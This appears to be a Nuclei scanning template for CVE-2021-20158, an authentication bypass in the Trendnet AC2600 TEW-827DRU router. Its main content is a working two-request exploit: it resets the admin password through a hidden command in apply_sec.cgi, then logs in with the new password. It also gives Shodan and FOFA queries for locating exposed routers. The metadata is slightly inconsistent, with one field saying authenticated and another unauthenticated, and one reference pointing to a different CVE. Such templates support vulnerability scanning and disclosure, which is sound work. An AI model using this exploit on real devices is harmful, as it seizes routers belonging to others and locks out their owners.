id: CVE-2021-20158

info:
  name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change
  author: gy741
  severity: critical
  description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.
  impact: |
    An attacker with authenticated access can gain unauthorized control over the affected device.
  remediation: |
    Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability.
  reference:
    - https://www.tenable.com/security/research/tra-2021-54
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20150
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-20158
    cwe-id: CWE-306
    epss-score: 0.01211
    epss-percentile: 0.8522
    cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: trendnet
    product: tew-827dru_firmware
    shodan-query:
      - http.html:"TEW-827DRU"
      - http.html:"tew-827dru"
    fofa-query: body="tew-827dru"
  tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet

variables:
  password: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}

        ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}

      - |
        POST /apply_sec.cgi HTTP/1.1
        Host: {{Hostname}}

        html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'setConnectDevice'
          - 'setInternet'
          - 'setWlanSSID'
          - 'TEW-827DRU'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008e7e01cc14a060ad40896cdbbb43c308b2ee4fd5a25756f3e3919c0a4897348202206805d2f1c31c886b77a4c6bcc7a223b139a34efba3c0f86f3e31d2395a37034b:922c64590222798bb761d5b6d8e72950